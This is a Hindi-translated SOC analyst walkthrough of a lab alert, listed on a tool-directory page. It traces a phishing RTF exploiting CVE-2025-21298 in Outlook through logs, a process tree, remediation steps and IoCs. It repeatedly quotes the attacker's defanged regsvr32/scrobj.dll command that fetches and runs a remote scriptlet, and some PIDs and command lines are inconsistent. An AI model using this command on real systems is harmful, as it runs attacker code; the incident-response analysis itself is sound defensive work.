Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298 — SOC336 - Windows OLE शून्य-क्लिक RCE शोषण का पता चला (CVE-2025-21298) Walkthrough | Kitploit
उपकरण/GitHubGitHub/abc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298
भेद्यता विश्लेषणशोषणपार्श्व आंदोलनरिवर्स इंजीनियरिंगफोरेंसिकफिशिंगमालवेयर विश्लेषणकमांड एंड कंट्रोलखतरा खुफिया
लर्निंग और शिक्षा
घटना प्रतिक्रिया
ईमेल सुरक्षा
GitHubabc1230940/soc336-windows-ole-zero-click-rce-exploitation-detected-cve-2025-21298

SOC336-Windows-OLE-Zero-Click-RCE-Exploitation-Detected-CVE-2025-21298

SOC336 - Windows OLE शून्य-क्लिक RCE शोषण का पता चला (CVE-2025-21298) Walkthrough

रिपॉजिटरी देखेंवेबसाइट
63 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

LinkedIn Gmail Instagram Old Discord Reddit


SOC336 - Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298) Walkthrough

फ़िशिंग ईमेल

🔎 विषय सूची
  1. स्थिति
अलर्ट अवलोकन
  • उपयोग किए गए उपकरण
  • विश्लेषण
    • ईमेल सुरक्षा
    • लॉग प्रबंधन
      • प्रॉक्सी लॉग
    • एंडपॉइंट सुरक्षा
      • टर्मिनल इतिहास
      • नेटवर्क कार्रवाई
      • प्रक्रियाएँ
      • CVE-2025-21298
  • प्लेबुक
  • विश्लेषक नोट
  • संदर्भ
  • (शीर्ष पर वापस जाएं)

    स्थिति

    हमारे एक कर्मचारी ऑस्टिन को एक संदिग्ध प्रेषक से फ़िशिंग ईमेल प्राप्त हुआ और उसने 4 फरवरी, 2025 को शाम 4:18 बजे आउटलुक का उपयोग करके ईमेल खोलने के बाद एक अलर्ट ट्रिगर हुआ। ट्रिगर का कारण था "ज्ञात CVE-2025-21298 एक्सप्लॉइट पैटर्न के साथ पहचाना गया दुर्भावनापूर्ण RTF अटैचमेंट" .

    (शीर्ष पर वापस जाएं)

    अलर्ट अवलोकन

    छवि

    EventID : 314

    इवेंट समय : 4 फरवरी, 2025, शाम 4:18 बजे (मुझे लगता है कि यह गलत था)

    नियम : SOC336 - Windows OLE Zero-Click RCE Exploitation Detected (CVE-2025-21298)

    स्तर : सुरक्षा विश्लेषक

    SMTP पता : 84.38.130.118

    स्रोत पता : [email protected]

    गंतव्य पता : [email protected]

    ईमेल विषय : महत्वपूर्ण: आगामी प्रोजेक्ट समय सीमा के लिए कार्रवाई आवश्यक

    अटैचमेंट : mail.rtf

    अटैचमेंट हैश : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184

    डिवाइस कार्रवाई : अनुमति दी गई

    ट्रिगर कारण : ज्ञात CVE-2025-21298 एक्सप्लॉइट पैटर्न के साथ पहचाना गया दुर्भावनापूर्ण RTF अटैचमेंट।

    (शीर्ष पर वापस जाएं)

    उपयोग किए गए उपकरण

    1. VirusTotal
    2. AbuseIPDB
    3. Gemini

    (शीर्ष पर वापस जाएं)

    विश्लेषण

    आइए अलर्ट ट्राइएज के लिए ईमेल सुरक्षा, लॉग प्रबंधन और एंडपॉइंट सुरक्षा लॉग में गहराई से जाएं।

    ईमेल सुरक्षा

    Screenshot 2026-05-27 151659

    मैंने प्रेषक पते projectmanagement@pm[.]me की खोज की और उसी दिन सुबह 5:12 बजे भेजे गए ईमेल "महत्वपूर्ण: आगामी प्रोजेक्ट समय सीमा के लिए कार्रवाई आवश्यक" पर क्लिक किया, जो मेरे लिए अजीब था क्योंकि "महत्वपूर्ण" और "कार्रवाई आवश्यक" जैसे तत्काल स्वर और शब्दों ने मुझे फ़िशिंग ईमेल का संकेत दिया।



    Screenshot 2026-05-27 175944

    मैंने VirusTotal पर डोमेन pm[.]me की खोज की और केवल 1 विक्रेता ने इसे संदिग्ध बताया।



    Screenshot 2026-05-27 151915

    हालाँकि, जब मैंने SMTP पते 84[.]38[.]130[.]118 की खोज की, तो 7 विक्रेताओं ने इसे दुर्भावनापूर्ण और मैलवेयर के रूप में चिह्नित किया और यह SILVER C2 सर्वर से संबंधित था।



    Screenshot 2026-05-27 180753
    Screenshot 2026-05-27 180810

    84[.]38[.]130[.]118 AbuseIPDB डेटाबेस में भी पाया गया। यह रीगा, रीगा, लातविया में स्थित है, डोमेन नाम rixhost.lv से संबंधित है और इसे DDoS हमला, हैकिंग और शोषित होस्ट के रूप में वर्गीकृत किया गया है।



    Screenshot 2026-05-27 152243

    अंत में मैंने VirusTotal पर अटैचमेंट mail.rtf के हैश df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 की खोज की और 61 में से 29 विक्रेताओं ने अटैचमेंट को दुर्भावनापूर्ण बताया। यह मैलवेयर परिवार rtfmalformb से संबंधित है और यह भेद्यता CVE-2025-21298 से जुड़ा था।

    यह पुष्टि हुई कि ऑस्टिन को एक दुर्भावनापूर्ण अटैचमेंट वाला फ़िशिंग ईमेल भेजा गया था।

    (शीर्ष पर वापस जाएं)

    लॉग प्रबंधन

    आइए जांच करें कि क्या सुबह 5:12 बजे के बाद जब ऑस्टिन ने फ़िशिंग ईमेल खोला तो कोई संदिग्ध गतिविधि हुई थी।

    प्रॉक्सी लॉग

    Screenshot 2026-05-27 152515

    मैंने पहले प्रॉक्सी लॉग की जाँच की और प्रेषक के दुर्भावनापूर्ण IP पते 84[.]38[.]130[.]118 की खोज की, यह पता चला कि सुबह 8:06 बजे cmd.exe द्वारा शुरू किए गए URL hxxp://84[.]38[.]130[.]118/shell[.]sct के साथ दुर्भावनापूर्ण IP पते पर एक HTTP GET अनुरोध था, जो एक Windows स्क्रिप्टलेट फ़ाइल डाउनलोड कर रहा था। प्रतिक्रिया कोड 200 OK था, जो दर्शाता है कि आउटबाउंड ट्रैफ़िक की अनुमति दी गई थी और फ़ायरवॉल द्वारा अवरुद्ध नहीं किया गया था। एक स्क्रिप्ट फ़ाइल प्राप्त करना असामान्य था जिसमें संभवतः रिवर्स शेल स्क्रिप्ट थी।

    (शीर्ष पर वापस जाएं)

    एंडपॉइंट सुरक्षा

    टर्मिनल इतिहास

    image
    Screenshot 2026-05-27 153447

    चूँकि दुर्भावनापूर्ण IP पते पर आउटबाउंड ट्रैफ़िक cmd.exe द्वारा शुरू किया गया था, मैंने पहले टर्मिनल इतिहास की जाँच की और पाया कि सुबह 8:06:08 बजे एक कमांड "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" को scrobj.dll द्वारा दुर्भावनापूर्ण IP पते से स्क्रिप्ट फ़ाइल प्राप्त करने के लिए regsvr32.exe को स्पॉन करने के लिए निष्पादित किया गया था।

    • regsvr32.exe: Windows रजिस्ट्री में DLL और ActiveX नियंत्रण जैसे OLE नियंत्रणों को पंजीकृत और अपंजीकृत करने के लिए एक कमांड-लाइन उपयोगिता
    • /s: regsvr32.exe पृष्ठभूमि में और चुपचाप चला
    • /u: Windows को इस कुंजी को Windows रजिस्ट्री में जोड़ने के लिए मजबूर नहीं किया
    • /i: इंटरफ़ेस
    • scrobj.dll: स्क्रिप्टलेट फ़ाइल को संभालने वाली स्क्रिप्ट ऑब्जेक्ट रनटाइम लाइब्रेरी

    स्क्रिप्ट प्राप्त करने के लिए Windows में निर्मित उपयोगिताओं का उपयोग करने से सिस्टम पर न्यूनतम निशान छोड़े जा सकते हैं, जिससे रिवर्स इंजीनियरिंग और मैलवेयर विश्लेषण प्रक्रिया अधिक कठिन हो जाती है!

    (शीर्ष पर वापस जाएं)

    नेटवर्क कार्रवाई

    Screenshot 2026-05-27 153102

    यह पुष्टि हुई कि कमांड के निष्पादन की घटना के बाद सुबह 8:06:42 बजे दुर्भावनापूर्ण IP 84[.]38[.]130[.]118 से एक कनेक्शन था।

    (शीर्ष पर वापस जाएं)

    प्रक्रियाएँ

    तो केवल एक ईमेल पर क्लिक करने से cmd.exe क्यों निष्पादित हुआ? जबकि ऑस्टिन द्वारा mail.rtf के दुर्भावनापूर्ण अटैचमेंट को डाउनलोड करने का कोई सबूत नहीं मिला, मैंने एंडपॉइंट लॉग की जाँच की और सुबह 8:06 बजे के आसपास किसी भी घटना की खोज की।

    Screenshot 2026-05-27 153636

    प्रक्रिया आईडी: 7023

    इवेंट समय: 4 फरवरी 2025 08:06:25

    कमांडलाइन: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

    पैरेंट प्रक्रिया: cmd.exe



    Screenshot 2026-05-27 153616

    ठीक है, तो चलिए पैरेंट प्रक्रिया cmd.exe देखते हैं

    प्रक्रिया आईडी: 6784

    इवेंट समय: 4 फरवरी 2025 08:06:08

    कमांडलाइन: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"

    पैरेंट प्रक्रिया: outlook.exe



    Screenshot 2026-05-27 154136

    और अंत में outlook.exe की पैरेंट प्रक्रिया की जाँच की गई

    प्रक्रिया आईडी: 4820

    इवेंट समय: 4 फरवरी 2025 08:05:15

    कमांडलाइन: "C:\Windows\System32\cmd.exe"

    पैरेंट प्रक्रिया: explorer.exe



    तो हम एक पेड़ में दुर्भावनापूर्ण प्रक्रियाओं का निष्कर्ष निकाल सकते हैं:

    explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! स्क्रिप्ट का निष्पादन !

    हालाँकि मैं अभी भी इस बात पर सवाल उठा रहा था कि दुर्भावनापूर्ण अटैचमेंट को डाउनलोड और खोले बिना दुर्भावनापूर्ण प्रक्रियाएँ कैसे शुरू हुईं, और outlook.exe ने दुर्भावनापूर्ण प्रक्रिया को कैसे जन्म दिया, जब तक कि मुझे CVE-2025-21298 के बारे में जानकारी नहीं मिली।

    (शीर्ष पर वापस जाएं)

    CVE-2025-21298

    Screenshot 2026-05-27 201652

    Offsec के लेख के अनुसार, जनवरी 2025 में CVSS स्कोर 9.8 के साथ एक महत्वपूर्ण Windows OLE जीरो-क्लिक भेद्यता थी जो ईमेल के माध्यम से RCE को सक्षम बनाती है। जब लक्षित प्राप्तकर्ता केवल Microsoft Outlook में एम्बेडेड स्क्रिप्ट वाले हानिकारक RTF दस्तावेज़ वाले दुर्भावनापूर्ण ईमेल को खोलता या पूर्वावलोकन करता है, तो भेद्यता ट्रिगर हो जाती है, जिससे हमलावर प्रभावित सिस्टम पर मनमाना कोड निष्पादित कर सकता है।

    मैंने Google और Gemini पर Windows OLE और RTF दस्तावेज़ की अपहरण प्रक्रियाओं के बारे में कुछ शोध किया और रिवर्स इंजीनियरिंग के अपने कुछ ज्ञान से संबंधित किया:

    1. RTF दस्तावेज़ को खोलने या पूर्वावलोकन करने पर, ole32.dll के अंदर UtOlePresStmToContentsStm फ़ंक्शन pstmContents द्वारा इंगित एक OLE ऑब्जेक्ट थंबनेल छवि डेटा (OlePres) को पढ़ने और इसे वास्तविक डेटा फ़ाइल (CONTENT) में डंप करने के लिए।
    2. फ़ंक्शन तुरंत हमलावर की RTF फ़ाइल के दूषित प्रारूप के कारण एक अप्रत्याशित प्रसंस्करण त्रुटि को ट्रिगर करता है, जिससे OLE ऑब्जेक्ट हटा दिया जाता है लेकिन pstmContents पॉइंटर नहीं।
    3. दुर्भावनापूर्ण RTF फ़ाइल ने हटाए गए OLE ऑब्जेक्ट के बिल्कुल समान आकार वाला एक दुर्भावनापूर्ण OLE ऑब्जेक्ट बनाया, जो pstmContents पॉइंटर द्वारा अभी भी इंगित उसी मेमोरी स्पेस को भरता है।
    4. आउटलुक द्वारा पूर्वावलोकन समाप्त करने के बाद, यह नकली "क्लीन-अप" प्रक्रिया चलाता है जिसमें दुर्भावनापूर्ण नकली OLE ऑब्जेक्ट के अंदर दुर्भावनापूर्ण कोड "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" होता है।
    5. पीड़ित का सिस्टम रिमोट पेलोड को निष्पादित करता है और बिना किसी क्लिक के स्वचालित रूप से एक रिवर्स शेल स्थापित करता है।

    (शीर्ष पर वापस जाएं)

    प्लेबुक

    Screenshot 2026-05-28 144059
    Screenshot 2026-05-28 144109
    Screenshot 2026-05-28 144141
    Screenshot 2026-05-28 144154
    Screenshot 2026-05-28 144226
    Screenshot 2026-05-28 144240

    क्वारंटाइन नहीं किया गया

    Screenshot 2026-05-28 144252

    दुर्भावनापूर्ण

    Screenshot 2026-05-28 144306

    एक्सेस किया गया

    Screenshot 2026-05-28 144316
    Screenshot 2026-05-28 144343
    Screenshot 2026-05-28 144730
    Screenshot 2026-05-28 144804
    Screenshot 2026-05-28 144844
    Screenshot 2026-05-28 144940
    Screenshot 2026-05-28 145001

    (शीर्ष पर वापस जाएं)

    विश्लेषक नोट

    वर्गीकरण: गंभीर

    प्रकार: मैलवेयर

    गतिविधि का समय:

    4 फरवरी, 2025, सुबह 5:12 बजे (फ़िशिंग ईमेल प्राप्त हुआ)

    4 फरवरी, 2025, सुबह 8:05:15 बजे - 4 फरवरी, 2025, सुबह 8:06:42 बजे (फ़िशिंग ईमेल खोला गया और दुर्भावनापूर्ण कोड निष्पादित किया गया)

    प्रभावित संस्थाएँ:

    स्रोत पता: projectmanagement@pm[.]me

    SMTP पता: 84[.]38[.]130[.]118

    प्राप्तकर्ता ईमेल पता: Austin@letsdefend[.]io

    प्राप्तकर्ता आईपी पता: 172[.]16[.]17[.]137

    होस्टनाम: ऑस्टिन

    वास्तविक सकारात्मक के कारण:

    4 फरवरी, 2025 को सुबह 5:12 बजे एक संदिग्ध ईमेल विषय "महत्वपूर्ण: आगामी प्रोजेक्ट समय सीमा के लिए कार्रवाई आवश्यक" [email protected] (आईपी पता: 84.38.130.118) से [email protected] (आईपी पता: 172.16.17.137) को एक अटैचमेंट mail.rtf (SHA256 हैश: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184) के साथ भेजा गया था। विषय में प्रयुक्त तत्काल स्वर और शब्दों ने फ़िशिंग ईमेल का संकेत दिया। थ्रेट इंटेल VirusTotal और AbuseIPDB ने प्रेषक के आईपी पते को चिह्नित किया, जो रीगा, रीगा, लातविया में स्थित है और डोमेन नाम rixhost.lv से संबंधित है और अटैचमेंट को दुर्भावनापूर्ण और मैलवेयर के रूप में चिह्नित किया।

    प्रॉक्सी लॉग के अनुसार, सुबह 8:06 बजे cmd.exe द्वारा शुरू किए गए URL hxxp://84[.]38[.]130[.]118/shell[.]sct के साथ दुर्भावनापूर्ण IP पते पर एक HTTP GET अनुरोध था, जो एक Windows स्क्रिप्टलेट फ़ाइल डाउनलोड कर रहा था। प्रतिक्रिया कोड 200 OK था, जो दर्शाता है कि दुर्भावनापूर्ण IP पते पर आउटबाउंड ट्रैफ़िक की अनुमति दी गई थी और फ़ायरवॉल द्वारा अवरुद्ध नहीं किया गया था।

    एंडपॉइंट सुरक्षा लॉग के अनुसार, दुर्भावनापूर्ण कोड "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (PID: 7023) cmd.exe (PID: 6784) द्वारा शुरू किया गया था जो outlook.exe (PID: 4820) से स्पॉन हुआ था।

    शोषण एक महत्वपूर्ण Windows OLE जीरो-क्लिक भेद्यता (CVE-2025-21298) के कारण हुआ था जो जनवरी 2025 में CVSS स्कोर 9.8 के साथ ईमेल के माध्यम से RCE को सक्षम बनाता है। जब लक्षित प्राप्तकर्ता केवल Microsoft Outlook में एम्बेडेड स्क्रिप्ट वाले हानिकारक RTF दस्तावेज़ वाले दुर्भावनापूर्ण ईमेल को खोलता या पूर्वावलोकन करता है, तो भेद्यता ट्रिगर हो जाती है, जिससे हमलावर प्रभावित सिस्टम पर मनमाना कोड निष्पादित कर सकता है, संभावित रूप से C2 सर्वर पर एक रिवर्स शेल स्थापित कर सकता है।

    एस्केलेशन के कारण:

    जबकि सक्रिय पोस्ट-एक्सप्लॉइटेशन C2 नेटवर्क ट्रैफ़िक अभी तक निश्चित रूप से नहीं देखा गया है, एंडपॉइंट सुरक्षा लॉग ने scrobj.dll का उपयोग करके regsvr32.exe के निष्पादन की पुष्टि की है ताकि स्क्रिप्टलेट फ़ाइल shell.sct प्राप्त की जा सके। CVE-2025-21298 के CVSS स्कोर 9.8 के कारण, होस्ट पर किसी भी संदिग्ध गतिविधि की जाँच करने के लिए और जाँच की आवश्यकता है जैसे कि निरंतरता या डेटा एक्सफिल्ट्रेशन।

    सुधारात्मक उपाय:

    • होस्ट ऑस्टिन को तुरंत कॉर्पोरेट आंतरिक नेटवर्क से डिस्कनेक्ट करें
    • "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" की प्रक्रिया और इससे संबंधित प्रक्रियाओं cmd.exe, outlook.exe को समाप्त करें
    • 84[.]38[.]130[.]118 पर आउटबाउंड ट्रैफ़िक को ब्लॉक करें
    • डोमेन rixhost[.]lv को ब्लैकलिस्ट करें
    • ईमेल सर्वर में प्रेषक projectmanagement@pm[.]me को ब्लैकलिस्ट करें
    • भेद्यता CVE-2025-21298 को पैच करें
    • ऑस्टिन के क्रेडेंशियल रीसेट करें
    • शेल.sct के निष्पादन के बाद C2 कनेक्शन, निरंतरता, डेटा एक्सफिल्ट्रेशन जैसी दुर्भावनापूर्ण गतिविधियों की जांच करने के लिए होस्ट ऑस्टिन पर मेमोरी विश्लेषण करें
    • shell.sct पर रिवर्स इंजीनियरिंग करें
    • ईमेल हेडर में मूल IP, रिटर्न पते की जांच करने के लिए ईमेल विश्लेषण करें
    • regsvr32.exe द्वारा शुरू किए गए इंटरनेट एक्सेस को ब्लॉक करें
    • कर्मचारियों को अज्ञात प्रेषकों से या तत्काल स्वर या शब्दों वाले ईमेल न खोलने के लिए शिक्षित करने के लिए फ़िशिंग जागरूकता अभियान चलाएं

    समझौता के संकेतक (IoC):

    • प्रेषक पता: projectmanagement@pm[.]me
    • प्रेषक IP पता: 84[.]38[.]130[.]118
    • प्रेषक डोमेन: rixhost[.]lv
    • फ़िशिंग ईमेल: "Important: Action Required for Upcoming Project Deadline"
    • दुर्भावनापूर्ण दस्तावेज़: mail.rtf (SHA256 हैश: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)
    • दुर्भावनापूर्ण प्रक्रिया वृक्ष: outlook.exe (PID: 4820) -> cmd.exe (PID: 6784) -> regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll (PID: 7023)
    • दूसरे पेलोड का URL: hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll

    (शीर्ष पर वापस जाएँ)

    संदर्भ

    CVE-2025-21298 विवरण

    CVE-2025-21298: एक गंभीर Windows OLE जीरो-क्लिक भेद्यता

    (शीर्ष पर वापस जाएँ)

    टूल डाउनलोड करें